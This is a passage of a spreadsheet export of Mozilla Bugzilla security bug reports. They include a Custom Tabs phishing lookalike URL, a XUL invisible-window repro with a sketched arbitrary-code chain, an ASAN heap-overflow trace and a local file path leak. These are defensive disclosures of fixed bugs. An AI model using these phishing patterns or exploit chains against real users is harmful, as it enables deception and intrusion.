        </is>
      </c>
      <c r="C5127" t="inlineStr">
        <is>
          <t>Firefox Custom Tabs have a phishing risk</t>
        </is>
      </c>
      <c r="D5127" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:14 -0700</t>
        </is>
      </c>
      <c r="E5127" t="n">
        <v>1</v>
      </c>
      <c r="F5127" t="n">
        <v>1</v>
      </c>
      <c r="G5127" t="n">
        <v>6</v>
      </c>
      <c r="H5127" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5127" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5127" t="inlineStr">
        <is>
          <t>Custom Tabs</t>
        </is>
      </c>
      <c r="K5127" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5127" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5127" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5127" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5127" t="inlineStr">
        <is>
          <t>[adv-main59+]</t>
        </is>
      </c>
      <c r="Q5127" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5127" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5127" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T5127" t="n">
        <v>1</v>
      </c>
      <c r="U5127" t="n">
        <v>0</v>
      </c>
      <c r="V5127" t="n">
        <v>15</v>
      </c>
      <c r="W5127" t="inlineStr">
        <is>
          <t>Created attachment 8944878
Custom Tab does not show the main domain, making phishing attacks easy
User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20180104170325
Steps to reproduce:
Open a site with very long domain (and, maybe, multiple subdomains) in Firefox Custom Tabs.
E.g. consider this URL:
https://paypal.com.securelogin.fakephissite.com/something?auth=whatever
As for testing (as a proof of concept) you can use this URL: https://long-extended-subdomain-name-containing-many-letters-and-dashes.badssl.com/?q=mnfdkjhfjksdhfjhjhfjdshjkfhsksdkjhg-greatwebsite
Open it in a custom tab. (navigate to it in some way as you want)
Actual results:
In the attached video you see that the main domain ("badssl.com") is not shown in Firefox Custom Tabs, but mostly the long subdomain, but in Firefox on Android itself it is correctly shown (and even highlighted, as you can see in the video).
That means if it were a paypal phishing site, It would display the URL as such:
https://paypal.com…?auth=whatever
I.e. it tries to show the beginning and end of the URL. But that is wrong from a security perspective, because as you can see, the user thinks they are on paypal.com now, while they are on fakephissite.com!
And as any Android app can open URLs in Custom Tabs (e.g. mail apps), any URL can be untrustworthy (from untrusted sources as any mail, social media or whereever the app fetches the addresses from), so you cannot assume the URL is legit. Of course, you can _nevber_ assume that user/third-party app input is trustworthy.
Expected results:
As in Firefox, do show (and potentially even highlight) the main domain and *not* the subdomain. Do not abbreviate the main domain.</t>
        </is>
      </c>
      <c r="X5127" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5128">
      <c r="A5128" t="n">
        <v>327014</v>
      </c>
      <c r="B5128" t="inlineStr">
        <is>
          <t>2006-02-13 08:46:38 -0800</t>
        </is>
      </c>
      <c r="C5128" t="inlineStr">
        <is>
          <t>Clicking &lt;html:a&gt; link in XUL document makes a browser window invisible</t>
        </is>
      </c>
      <c r="D5128" t="inlineStr">
        <is>
          <t>2007-04-19 02:14:28 -0700</t>
        </is>
      </c>
      <c r="E5128" t="n">
        <v>1</v>
      </c>
      <c r="F5128" t="n">
        <v>1</v>
      </c>
      <c r="G5128" t="n">
        <v>3</v>
      </c>
      <c r="H5128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5128" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5128" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5128" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5128" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5128" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5128" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5128" t="inlineStr">
        <is>
          <t>[sg:moderate] bfcache-related[rft-dl]</t>
        </is>
      </c>
      <c r="Q5128" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5128" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5128" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5128" t="n">
        <v>1</v>
      </c>
      <c r="U5128" t="n">
        <v>0</v>
      </c>
      <c r="V5128" t="n">
        <v>27</v>
      </c>
      <c r="W5128" t="inlineStr">
        <is>
          <t>Clicking &lt;html:a&gt; link in XUL document makes a browser window invisible.
XUL-DOC:
&lt;window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;p xmlns="http://www.w3.org/1999/xhtml"&gt;
    &lt;a href="about:blank"&gt;a&lt;/a&gt;
  &lt;/p&gt;
&lt;/window&gt;
1. w = open("XUL-DOC");
2. Click the link on XUL-DOC.  Then about:blank is loaded.
3. Move mouse.  Then XUL-DOC's browser window becomes invisible.
4. w.history.back();
Then the browser UI is still invisible, but XUL-DOC's content elements are
displayed onto the browser UI.
Note:
1.5.0.1 and trunk are affected. 1.0.x is not affected.
When bfcache is disabled, this bug is not reproducible.
On Linux, this bug is not reproducible. (I've tested on Windows XP and Linux.)
This bug could be used to exploit.  For example, if an attacker created a 
JavaScript game page and could convince a user to drag and drop two links
(about:config and javascript:...) onto the invisible Bookmarks Toolbar, and
click those bookmarks in sequence, then an attacker could run arbitrary code.</t>
        </is>
      </c>
      <c r="X5128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5129">
      <c r="A5129" t="n">
        <v>1291016</v>
      </c>
      <c r="B5129" t="inlineStr">
        <is>
          <t>2016-08-01 14:02:39 -0700</t>
        </is>
      </c>
      <c r="C5129" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in  nsCaseTransformTextRunFactory::TransformString</t>
        </is>
      </c>
      <c r="D5129" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:52 -0700</t>
        </is>
      </c>
      <c r="E5129" t="n">
        <v>1</v>
      </c>
      <c r="F5129" t="n">
        <v>1</v>
      </c>
      <c r="G5129" t="n">
        <v>3</v>
      </c>
      <c r="H5129" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5129" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5129" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K5129" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5129" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5129" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5129" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5129" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q5129" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5129" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5129" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5129" t="n">
        <v>1</v>
      </c>
      <c r="U5129" t="n">
        <v>0</v>
      </c>
      <c r="V5129" t="n">
        <v>25</v>
      </c>
      <c r="W5129" t="inlineStr">
        <is>
          <t>Created attachment 8776699
firefox-heap-buffer-overflow-TransformString10-min.html
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/firefox/tinderbox-builds/mozilla-central-linux64-asan/1470062453/ 
Repro-file as an attachment.
ASAN-trace:
==8332==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d0002dd080 at pc 0x7f09051bc66b bp 0x7ffd0d8d03f0 sp 0x7ffd0d8d03e8
WRITE of size 1 at 0x61d0002dd080 thread T0 (Web Content)
    #0 0x7f09051bc66a in nsCaseTransformTextRunFactory::TransformString(nsAString_internal const&amp;, nsString&amp;, bool, nsIAtom const*, nsTArray&lt;bool&gt;&amp;, nsTArray&lt;bool&gt;&amp;, nsTransformedTextRun*, nsTArray&lt;unsigned char&gt;*, nsTArray&lt;RefPtr&lt;nsTransformedCharStyle&gt; &gt;*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.cpp:484:47
    #1 0x7f09051bd328 in nsCaseTransformTextRunFactory::RebuildTextRun(nsTransformedTextRun*, mozilla::gfx::DrawTarget*, gfxMissingFontRecorder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.cpp:619:22
    #2 0x7f0905165491 in FinishSettingProperties /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.h:150:7
    #3 0x7f0905165491 in BuildTextRunsScanner::BreakSink::Finish(gfxMissingFontRecorder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:955
    #4 0x7f0905164f05 in BuildTextRunsScanner::FlushLineBreaks(gfxTextRun*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1483:5
    #5 0x7f090515bf9f in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1462:5
    #6 0x7f090516e629 in BuildTextRuns /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1386:3
    #7 0x7f090516e629 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:2668
    #8 0x7f09051ae576 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, mozilla::gfx::DrawTarget*, mozilla::ReflowOutput&amp;, unsigned int&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:8879:5
    #9 0x7f0904edd7cd in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, mozilla::ReflowOutput*, bool&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsLineLayout.cpp:945:5
    #10 0x7f0904f799f5 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsBlockFrame.cpp:4089:3
    #11 0x7f0904f78711 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsBlockFrame.cpp:3891:5
.
.
.
0x61d0002dd080 is located 0 bytes to the right of 2048-byte region [0x61d0002dc880,0x61d0002dd080)
allocated by thread T0 (Web Content) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0d7d in moz_xrealloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7f08fdaf2751 in Realloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTArray.h:182:12
    #3 0x7f08fdaf2751 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7f09051babca in AppendElement&lt;bool, nsTArrayInfallibleAllocator&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTArray.h:2027:32
    #5 0x7f09051babca in nsCaseTransformTextRunFactory::TransformString(nsAString_internal const&amp;, nsString&amp;, bool, nsIAtom const*, nsTArray&lt;bool&gt;&amp;, nsTArray&lt;bool&gt;&amp;, nsTransformedTextRun*, nsTArray&lt;unsigned char&gt;*, nsTArray&lt;RefPtr&lt;nsTransformedCharStyle&gt; &gt;*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.cpp:570
    #6 0x7f09051bd328 in nsCaseTransformTextRunFactory::RebuildTextRun(nsTransformedTextRun*, mozilla::gfx::DrawTarget*, gfxMissingFontRecorder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.cpp:619:22
    #7 0x7f0905165491 in FinishSettingProperties /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextRunTransformations.h:150:7
    #8 0x7f0905165491 in BuildTextRunsScanner::BreakSink::Finish(gfxMissingFontRecorder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:955
    #9 0x7f0905164f05 in BuildTextRunsScanner::FlushLineBreaks(gfxTextRun*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1483:5
    #10 0x7f090515bf9f in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1462:5
    #11 0x7f090516e629 in BuildTextRuns /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:1386:3
    #12 0x7f090516e629 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsTextFrame.cpp:2668
.
.
.</t>
        </is>
      </c>
      <c r="X5129" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5130">
      <c r="A5130" t="n">
        <v>1249522</v>
      </c>
      <c r="B5130" t="inlineStr">
        <is>
          <t>2016-02-18 20:14:53 -0800</t>
        </is>
      </c>
      <c r="C5130" t="inlineStr">
        <is>
          <t>Full local path of files is available to web pages after drag and drop</t>
        </is>
      </c>
      <c r="D5130" t="inlineStr">
        <is>
          <t>2017-08-28 13:30:21 -0700</t>
        </is>
      </c>
      <c r="E5130" t="n">
        <v>1</v>
      </c>
      <c r="F5130" t="n">
        <v>1</v>
      </c>
      <c r="G5130" t="n">
        <v>3</v>
      </c>
      <c r="H5130" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5130" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5130" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K5130" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5130" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5130" t="inlineStr">
        <is>
          <t>[adv-main49+] btpp-fixlater</t>
        </is>
      </c>
      <c r="Q5130" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5130" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5130" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T5130" t="n">
        <v>1</v>
      </c>
      <c r="U5130" t="n">
        <v>0</v>
      </c>
      <c r="V5130" t="n">
        <v>25</v>
      </c>
      <c r="W5130" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1226977 +++
1. Visit &lt;https://ebenda.org/2016/file-path/display.html&gt;.
2. Drag and drop a file from Windows Explorer or (GNOME/Ubuntu) Files (Nautilus) into the web page.
3. You will see the full path of the dragged path.
The full path will be available via dataTransfer.getData("text/x-moz-url") on Windows and GNU/Linux (and probably OS X).
It will also be available via various other types when dragged from Nautilus.
The "text/x-moz-url" content is completely synthesized by Firefox, whereas Nautilus really sends ['x-special/gnome-icon-list', 'text/uri-list', 'UTF8_STRING', 'COMPOUND_TEXT', 'TEXT', 'STRING', 'text/plain;charset=utf-8', 'text/plain']) containing the file URL. Firefox will have, for better or worse, to disregard these types in this case as to conform to the platform's convetion (Chrome seems to disregard all other types if Files are provided during drag and drop).
It is questionable whether this path should be available to web content for privacy reasons. It also allows for further exploitation ("Disclosure of OS username" is the most easy) and can help to exploit other bugs (as shown in bug 1226977 comment 10). For the input element, it was considered a security bug (&lt;https://www.mozilla.org/en-US/security/advisories/mfsa2013-43/&gt;).
Existing web content might depend on this (a possible use case would be an internal CMS storing paths of images dragged and dropped from a shared network drive to track and automatically update them on changes). Chrome does not expose the full path of dropped files to web pages in either case (unsure about other browsers implementing dragging and dropping of files), so this is not really web-compatible anyhow, and I guess Firefox should not expose the paths either.</t>
        </is>
      </c>
      <c r="X5130" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5131">
      <c r="A5131" t="n">
        <v>448548</v>
      </c>
      <c r="B5131" t="inlineStr">
        <is>
          <t>2008-07-30 10:08:16 -0700</t>
        </is>
      </c>
      <c r="C5131" t="inlineStr">
        <is>
          <t>XSLT creates documents which don't have script handling objects</t>
        </is>
      </c>
      <c r="D5131" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5131" t="n">
        <v>1</v>
      </c>
      <c r="F5131" t="n">
        <v>1</v>
      </c>
      <c r="G5131" t="n">
        <v>3</v>
      </c>
      <c r="H5131" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5131" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5131" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5131" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5131" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5131" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5131" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5131" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5131" t="n">
        <v>1</v>
      </c>
      <c r="U5131" t="n">
        <v>0</v>
      </c>
      <c r="V5131" t="n">
        <v>22</v>
      </c>
      <c r="W5131" t="inlineStr">
        <is>
          <t>This may cause similar problems as bug 393761 and bug 393762.</t>
        </is>
      </c>
      <c r="X5131" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5132">
      <c r="A5132" t="n">
        <v>208604</v>
      </c>
      <c r="B5132" t="inlineStr">
        <is>
          <t>2003-06-07 00:26:40 -0700</t>
        </is>
      </c>
      <c r="C5132" t="inlineStr">
        <is>
          <t>Make data/template dir locations configurable</t>
        </is>
      </c>
      <c r="D5132" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:36 -0800</t>
        </is>
      </c>
      <c r="E5132" t="n">
        <v>1</v>
      </c>
      <c r="F5132" t="n">
        <v>1</v>
      </c>
      <c r="G5132" t="n">
        <v>4</v>
      </c>
      <c r="H5132" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5132" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5132" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5132" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L5132" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5132" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5132" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5132" t="inlineStr"/>
      <c r="Q5132" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5132" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5132" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5132" t="n">
        <v>1</v>
      </c>
      <c r="U5132" t="n">
        <v>0</v>
      </c>
      <c r="V5132" t="n">
        <v>21</v>
      </c>
      <c r="W5132" t="inlineStr">
        <is>
          <t>mod_perl needs to use absolute paths for various reasons, mainly because the
startup.pl stuff doesn't run from the cgi dir, and under mp2 thers no chdir at all.
I've got a patch which does this. Note that the paths defined in
Bugzilla::Config, not localconfig. Under mod_perl we can grab this from
.htaccess configuration directives. with a normal cgi, we could grab these from
localconfig, but there are ordering issues esp with checksetup, so I'd rather
leave them in the .pm for the moment. $localconfig will obviously never be
configurable via a conf file...
webdot is special because it needs to be in the webtree. The script should
generate the graphs directly to stdout like report.cgi does, and then we
wouldn't have to worry about this unless webdot was being used.
The graph/ dir has the same issue, but I didn't move it because gerv's graphing
rewrite gets rid of it, IIRC.</t>
        </is>
      </c>
      <c r="X5132" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5133">
      <c r="A5133" t="n">
        <v>852781</v>
      </c>
      <c r="B5133" t="inlineStr">
        <is>
          <t>2013-03-19 17:18:28 -0700</t>
        </is>
      </c>
      <c r="C5133" t="inlineStr">
        <is>
          <t>TestUser50.cert and TestUser51.cert just expired, PayPalEE will expire April 1</t>
        </is>
      </c>
      <c r="D5133" t="inlineStr">
        <is>
          <t>2013-03-20 13:46:11 -0700</t>
        </is>
      </c>
      <c r="E5133" t="n">
        <v>1</v>
      </c>
      <c r="F5133" t="n">
        <v>1</v>
      </c>
      <c r="G5133" t="n">
        <v>3</v>
      </c>
      <c r="H5133" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5133" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5133" t="inlineStr">
        <is>
          <t>Test</t>
        </is>
      </c>
      <c r="K5133" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5133" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5133" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5133" t="inlineStr"/>
      <c r="Q5133" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5133" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5133" t="inlineStr">
        <is>
          <t>3.15</t>
        </is>
      </c>
      <c r="T5133" t="n">
        <v>1</v>
      </c>
      <c r="U5133" t="n">
        <v>0</v>
      </c>
      <c r="V5133" t="n">
        <v>11</v>
      </c>
      <c r="W5133" t="inlineStr">
        <is>
          <t>Kai, could you regenerate the test certificates TestUser50.cert and
TestUser51.cert in nss/tests/libpkix/certs/?  They just expired
today.
$ pp -t certificate -i ./tests/libpkix/certs/TestUser50.cert 
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 50 (0x32)
        Signature Algorithm: PKCS #1 SHA-1 With RSA Encryption
        Issuer: "CN=NSS Test CA,O=BOGUS NSS,L=Mountain View,ST=California,C=U
            S"
        Validity:
            Not Before: Wed Mar 19 21:04:48 2008
            Not After : Tue Mar 19 21:04:48 2013
        Subject: "CN=TestUser50,E=TestUser50@bogus.com,O=BOGUS NSS,L=Mountain
             View,ST=California,C=US"
        Subject Public Key Info:
            Public Key Algorithm: PKCS #1 RSA Encryption
            RSA Public Key:
                Modulus:
                    ab:35:c2:da:2a:5f:b2:dc:f9:dd:af:b9:9a:6f:04:3c:
                    0f:0f:cf:f2:93:ea:fa:20:23:f6:a6:66:57:1e:4e:d5:
                    a5:af:ca:83:99:4e:73:dc:e5:a1:12:db:55:66:57:7f:
                    3b:2f:2a:d9:a0:9e:14:2a:b8:07:78:35:07:a6:15:76:
                    81:cf:eb:27:24:c7:8b:19:73:6a:0f:27:0d:c9:c7:2a:
                    d2:da:19:0d:48:15:b2:ac:01:a3:95:1b:13:2d:dc:e5:
                    1f:93:7b:c5:9b:c1:78:64:f1:24:01:64:e6:ad:3a:f0:
                    d5:6f:98:12:37:3c:15:46:33:45:c3:9d:72:fa:81:bf
                Exponent: 65537 (0x10001)
    Signature Algorithm: PKCS #1 SHA-1 With RSA Encryption
    Signature:
        0b:2b:5b:19:e1:e5:0a:35:17:96:da:97:56:68:c4:fb:
        04:86:71:20:e0:f3:0a:cc:ae:3f:77:e5:16:0a:59:24:
        ec:32:1f:5f:bd:5d:0d:c3:c8:d1:59:9e:ad:bb:fb:10:
        fc:04:37:0f:85:a4:a1:3f:35:50:bb:8e:52:ef:0d:0f:
        75:9e:ce:33:90:5d:10:d6:50:df:4f:25:c1:ff:ae:c5:
        e8:8e:69:99:6a:1f:fb:d7:b7:e2:69:e6:56:a6:09:fb:
        ae:ec:c6:f9:d7:e5:a2:1b:18:ed:69:0b:f1:9b:7d:47:
        8f:3b:98:74:97:ab:0f:96:3c:06:9e:54:e6:ee:3f:00
    Fingerprint (MD5):
        54:39:96:80:05:6C:9B:A4:56:48:29:85:CB:67:AB:DD
    Fingerprint (SHA1):
        4C:24:73:26:21:85:A5:C7:F4:49:0F:59:2F:AD:52:84:C3:A8:4F:A6
The test CA certificate is valid until Tue Mar 19 21:04:25 2058.
I suggest that the new certificates should also be valid until
year 2058.
I don't know if we have the private key corresponding to TestCA.ca.cert.
If not, we will need to regenerate the test CA certificate as well.
Thank you.</t>
        </is>
      </c>
      <c r="X5133" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5134">
      <c r="A5134" t="n">
        <v>1222101</v>
      </c>
      <c r="B5134" t="inlineStr">
        <is>
          <t>2015-11-05 10:19:55 -0800</t>
        </is>
      </c>
      <c r="C5134" t="inlineStr">
        <is>
          <t>TSan: data race ipc/glue/MessagePump.cpp:142 ScheduleWork (race on mThread)</t>
        </is>
      </c>
      <c r="D5134" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:26 -0800</t>
        </is>
      </c>
      <c r="E5134" t="n">
        <v>1</v>
      </c>
      <c r="F5134" t="n">
        <v>1</v>
      </c>
      <c r="G5134" t="n">
        <v>3</v>
      </c>
      <c r="H5134" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5134" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5134" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K5134" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5134" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5134" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5134" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5134" t="inlineStr">
        <is>
          <t>[tsan][post-critsmash-triage][adv-main48+]</t>
        </is>
      </c>
      <c r="Q5134" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5134" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5134" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T5134" t="n">
        <v>1</v>
      </c>
      <c r="U5134" t="n">
        <v>0</v>
      </c>
      <c r="V5134" t="n">
        <v>17</v>
      </c>
      <c r="W5134" t="inlineStr">
        <is>
          <t>Created attachment 8683783
TSan stack trace
The attached logfile shows a thread/data race detected by TSan (ThreadSanitizer).
* Specific information about this bug
STR: apply test harness patch from bug 1222043m then run:
TSAN_OPTIONS=suppressions=/home/sewardj/MOZ/SUPPS/tsan-1.txt DISPLAY=:1.0 ./mach xpcshell-test --sequential --log-mach - dom/base/test/unit_ipc/test_bug553888_wrap.js 2&gt;&amp;1 | tee spew-53-tsan-1
Looks like a race on MessagePump::mThread.
